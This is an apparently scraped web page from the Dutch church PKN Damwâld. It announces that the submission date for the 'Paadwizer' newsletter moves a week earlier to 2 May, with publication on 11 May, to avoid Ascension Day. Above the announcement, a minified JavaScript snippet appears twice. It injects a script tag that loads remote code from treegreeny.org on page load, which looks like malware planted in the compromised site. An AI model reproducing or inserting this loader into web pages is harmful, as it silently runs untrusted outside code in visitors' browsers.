;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wijziging inleverdatum Paadwizer - PKN Damwâld

Wijziging inleverdatum Paadwizer

Gepubliceerd op: maandag 24 april 2023

Omdat de bezorging van de Paadwizer in eerste instantie samenviel met Hemelvaartsdag is in goed overleg besloten de inleverdatum en dus ook de verspreidingsdatum met een week te vervroegen.

Dit betekent dat de inleverdatum nu 2 mei is, de verschijningsdatum is dan 11 mei.